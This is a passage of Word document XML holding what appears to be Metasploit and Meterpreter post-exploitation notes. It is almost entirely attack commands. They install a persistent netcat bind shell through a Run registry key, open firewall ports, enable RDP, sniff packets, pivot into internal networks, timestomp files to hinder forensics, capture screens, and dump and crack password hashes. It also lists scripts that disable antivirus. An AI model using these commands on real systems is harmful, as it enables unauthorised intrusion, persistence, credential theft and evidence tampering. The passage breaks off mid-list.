          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Persistent NetCat Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F2DF6A" w14:textId="4B09E4D1" w:rsidR="00604950" w:rsidRDefault="00604950" w:rsidP="00604950">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>upload /usr/share/windows-binaries/nc.exe C:\\windows\system32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559C0D40" w14:textId="12D2C1ED" w:rsidR="00417F63" w:rsidRDefault="00417F63" w:rsidP="00604950">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FAEBC6" w14:textId="77777777" w:rsidR="00417F63" w:rsidRDefault="00417F63" w:rsidP="00417F63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>reg setval -k  HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A66528D" w14:textId="1D99F213" w:rsidR="00417F63" w:rsidRDefault="00417F63" w:rsidP="00417F63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00417F63">
        <w:t>reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E87375" w14:textId="28F87984" w:rsidR="00417F63" w:rsidRDefault="00417F63" w:rsidP="00417F63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>execute -f cmd -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5A97B1" w14:textId="0230E8F7" w:rsidR="00417F63" w:rsidRDefault="00417F63" w:rsidP="00417F63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>netsh firewall show opmode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2966038E" w14:textId="099A3E0B" w:rsidR="00417F63" w:rsidRDefault="00417F63" w:rsidP="00417F63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>netsh firewall add portopening TCP 445 “Service Firewall” ENABLE ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4AF340" w14:textId="0569D2CB" w:rsidR="00417F63" w:rsidRDefault="00417F63" w:rsidP="00417F63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>netsh firewall show portopening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C86207" w14:textId="13750757" w:rsidR="00417F63" w:rsidRDefault="00417F63" w:rsidP="00417F63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nc -v &lt;ip&gt; &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA754D3" w14:textId="5DD59F92" w:rsidR="00417F63" w:rsidRDefault="00417F63" w:rsidP="00417F63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67578A8A" w14:textId="6E5CB729" w:rsidR="00417F63" w:rsidRDefault="00417F63" w:rsidP="00417F63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enabling Remote Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EB8E1C" w14:textId="065F510A" w:rsidR="00417F63" w:rsidRDefault="00417F63" w:rsidP="00417F63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run getgui</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B49FF6" w14:textId="07FB8752" w:rsidR="00417F63" w:rsidRDefault="00417F63" w:rsidP="00417F63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run getgui -u &lt;username&gt; -p &lt;password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5782FD8D" w14:textId="580A895E" w:rsidR="004626D6" w:rsidRDefault="004626D6" w:rsidP="00417F63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>rdesktop -u &lt;username&gt; -p &lt;password&gt; &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2744C699" w14:textId="44FE405A" w:rsidR="004626D6" w:rsidRDefault="004626D6" w:rsidP="00417F63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run clean up script once done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F7903D" w14:textId="06FCD5CB" w:rsidR="004626D6" w:rsidRDefault="004626D6" w:rsidP="004626D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004626D6">
        <w:t>run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20110112.2448.rc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA28C70" w14:textId="4D1D20A2" w:rsidR="004626D6" w:rsidRDefault="004626D6" w:rsidP="004626D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Packet Sniffing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7179C748" w14:textId="34E087C9" w:rsidR="004626D6" w:rsidRDefault="004626D6" w:rsidP="004626D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>After gaining meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C609DB" w14:textId="314042F4" w:rsidR="004626D6" w:rsidRDefault="004626D6" w:rsidP="004626D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use sniffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09554B3C" w14:textId="66C29B67" w:rsidR="004626D6" w:rsidRDefault="004626D6" w:rsidP="004626D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sniffer_interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D09EED" w14:textId="38E32B21" w:rsidR="004626D6" w:rsidRDefault="004626D6" w:rsidP="004626D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sniffer_start &lt;choice&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFA6282" w14:textId="5AB0ADC3" w:rsidR="004626D6" w:rsidRDefault="004626D6" w:rsidP="004626D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sniffer_dump &lt;choice&gt; /path/to/file.cap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4706EE3A" w14:textId="00723ED3" w:rsidR="004626D6" w:rsidRDefault="004626D6" w:rsidP="004626D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sniffer_stats &lt;choice&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E0C792" w14:textId="6379AAD6" w:rsidR="004626D6" w:rsidRDefault="004626D6" w:rsidP="004626D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sniffer_stop &lt;choice&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9BB91F" w14:textId="7C436FCB" w:rsidR="004626D6" w:rsidRDefault="004626D6" w:rsidP="004626D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sniffer_release &lt;choice&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4224C8C4" w14:textId="3DF16F63" w:rsidR="004626D6" w:rsidRDefault="004626D6" w:rsidP="004626D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Packet Recorder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724B0E6A" w14:textId="1272B6C8" w:rsidR="004626D6" w:rsidRDefault="004626D6" w:rsidP="004626D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run packetrecorder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E0A7C3" w14:textId="4012B8E6" w:rsidR="004626D6" w:rsidRDefault="004626D6" w:rsidP="004626D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-li – list interfaces to be sniffed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294C1743" w14:textId="2DC38CD3" w:rsidR="004626D6" w:rsidRDefault="004626D6" w:rsidP="004626D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run packetrecorder -i &lt;choice&gt; -l /root/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FE3DDD" w14:textId="30B805FF" w:rsidR="004626D6" w:rsidRDefault="004626D6" w:rsidP="004626D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Pivoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECACFA5" w14:textId="5EF4D48B" w:rsidR="004626D6" w:rsidRDefault="009D73EF" w:rsidP="004626D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run autoroute -s &lt;ip/cidr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718AC06B" w14:textId="75F4BDB1" w:rsidR="009D73EF" w:rsidRDefault="009D73EF" w:rsidP="004626D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run autoroute -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491E314D" w14:textId="3D605E5F" w:rsidR="009D73EF" w:rsidRDefault="009D73EF" w:rsidP="004626D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>getsystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35112C9E" w14:textId="618A0D52" w:rsidR="009D73EF" w:rsidRDefault="009D73EF" w:rsidP="004626D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Port Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082DE3FA" w14:textId="53524692" w:rsidR="009D73EF" w:rsidRDefault="009D73EF" w:rsidP="009D73EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use auxiliary/scanner/portscan/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166A267C" w14:textId="2BF5FCCF" w:rsidR="009D73EF" w:rsidRDefault="009D73EF" w:rsidP="009D73EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F069FE" w14:textId="0D4CE1CD" w:rsidR="009D73EF" w:rsidRDefault="009D73EF" w:rsidP="009D73EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Portfwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597F2281" w14:textId="31C31867" w:rsidR="009D73EF" w:rsidRDefault="009D73EF" w:rsidP="009D73EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>portfwd command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248BEBAE" w14:textId="1E5B4C85" w:rsidR="009D73EF" w:rsidRDefault="009D73EF" w:rsidP="009D73EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>portfwd -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB24BE0" w14:textId="0AE8A2CE" w:rsidR="009D73EF" w:rsidRDefault="009D73EF" w:rsidP="009D73EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>allows access to machines otherwise inaccessible from attacking system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BA81F8" w14:textId="73F776D7" w:rsidR="009D73EF" w:rsidRDefault="009D73EF" w:rsidP="009D73EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>allows forwarding of TCP connections</w:t>
      </w:r>
      <w:r w:rsidR="00C26B4C">
        <w:t xml:space="preserve"> through a machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77970958" w14:textId="307219E9" w:rsidR="00C26B4C" w:rsidRDefault="00C26B4C" w:rsidP="009D73EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>relays TCP connections to and from the connected machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2458C81A" w14:textId="3BD99815" w:rsidR="00C26B4C" w:rsidRDefault="00C26B4C" w:rsidP="00C26B4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Timestop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AC3632" w14:textId="27547BB3" w:rsidR="00C26B4C" w:rsidRDefault="00C26B4C" w:rsidP="00C26B4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1A5917" w14:textId="6624894C" w:rsidR="00C26B4C" w:rsidRDefault="00C26B4C" w:rsidP="00C26B4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use priv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B40BAB" w14:textId="48440D74" w:rsidR="00C26B4C" w:rsidRDefault="00C26B4C" w:rsidP="00C26B4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>timestop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C4F880" w14:textId="6D549D90" w:rsidR="00C26B4C" w:rsidRDefault="00C26B4C" w:rsidP="00C26B4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use MAC times of another file while looking at another file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622D981E" w14:textId="1396AFC3" w:rsidR="00C26B4C" w:rsidRDefault="00C26B4C" w:rsidP="00C26B4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use -b to zero out timing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E179A0" w14:textId="388B730B" w:rsidR="0033735D" w:rsidRDefault="0033735D" w:rsidP="0033735D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>can crash some forensic tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C93E71" w14:textId="6851172C" w:rsidR="0033735D" w:rsidRDefault="0033735D" w:rsidP="0033735D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>can zero out whole drive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F2DAB0" w14:textId="02B9AF5E" w:rsidR="0033735D" w:rsidRDefault="0033735D" w:rsidP="0033735D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>timestop C:\\ -r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E9817C" w14:textId="5BA13133" w:rsidR="0033735D" w:rsidRDefault="0033735D" w:rsidP="0033735D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Screen Capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E95781" w14:textId="4F61E55C" w:rsidR="0033735D" w:rsidRDefault="0033735D" w:rsidP="0033735D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A8D216" w14:textId="588546A0" w:rsidR="0033735D" w:rsidRDefault="0033735D" w:rsidP="0033735D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>migrate &lt;PID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF346EA" w14:textId="01EBC08E" w:rsidR="0033735D" w:rsidRDefault="0033735D" w:rsidP="0033735D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use espia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C46B810" w14:textId="1162D0D5" w:rsidR="0033735D" w:rsidRDefault="0033735D" w:rsidP="0033735D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>screengrab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F2403E" w14:textId="03AAD57B" w:rsidR="0033735D" w:rsidRDefault="0033735D" w:rsidP="0033735D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Searching For Contact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCC88B4" w14:textId="27A1537C" w:rsidR="0033735D" w:rsidRDefault="0033735D" w:rsidP="0033735D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>search -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730C71C5" w14:textId="65E71DEA" w:rsidR="0033735D" w:rsidRDefault="0033735D" w:rsidP="0033735D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>search -f *.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7398B6" w14:textId="57EBD11F" w:rsidR="0033735D" w:rsidRDefault="0033735D" w:rsidP="0033735D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0033735D">
        <w:t>search -d c:\\documents\ and\ settings\\administrator\\desktop\\ -f *.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC2783E" w14:textId="4D527F47" w:rsidR="0033735D" w:rsidRDefault="0033735D" w:rsidP="0033735D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>John The Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E9B875" w14:textId="1BFB5967" w:rsidR="0033735D" w:rsidRDefault="0033735D" w:rsidP="0033735D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use post/windows/gather/hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A17BCB" w14:textId="095788F9" w:rsidR="0033735D" w:rsidRDefault="0033735D" w:rsidP="0033735D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2E76DE" w14:textId="76C269B0" w:rsidR="0033735D" w:rsidRDefault="0033735D" w:rsidP="0033735D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5D8D9C" w14:textId="5ED31438" w:rsidR="0033735D" w:rsidRDefault="0033735D" w:rsidP="0033735D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use auxiliary/analyze/jtr_crack_fast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BBA180" w14:textId="0E78E85B" w:rsidR="00737F88" w:rsidRDefault="00737F88" w:rsidP="00737F88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>METERPRETER SCRIPTING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F76A521" w14:textId="41C6A99C" w:rsidR="00CB5036" w:rsidRDefault="00CB5036" w:rsidP="00CB5036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Existing Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D659B03" w14:textId="2D82EA5E" w:rsidR="00CB5036" w:rsidRDefault="00CB5036" w:rsidP="00CB5036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>CHECKVM – check if exploited victim is a VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1265D119" w14:textId="446CE8AB" w:rsidR="00CB5036" w:rsidRDefault="00CB5036" w:rsidP="00CB5036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>GETCOUNTERMEASURE – checks the security configuration on victim and can disable other security measures such as AV, Firewalls, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2126B8E5" w14:textId="3B073DFF" w:rsidR="00CB5036" w:rsidRDefault="00CB5036" w:rsidP="00CB5036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>GETGUI – used to enable RDP on target system if disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE233B5" w14:textId="350146E8" w:rsidR="00CB5036" w:rsidRDefault="00CB5036" w:rsidP="00CB5036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
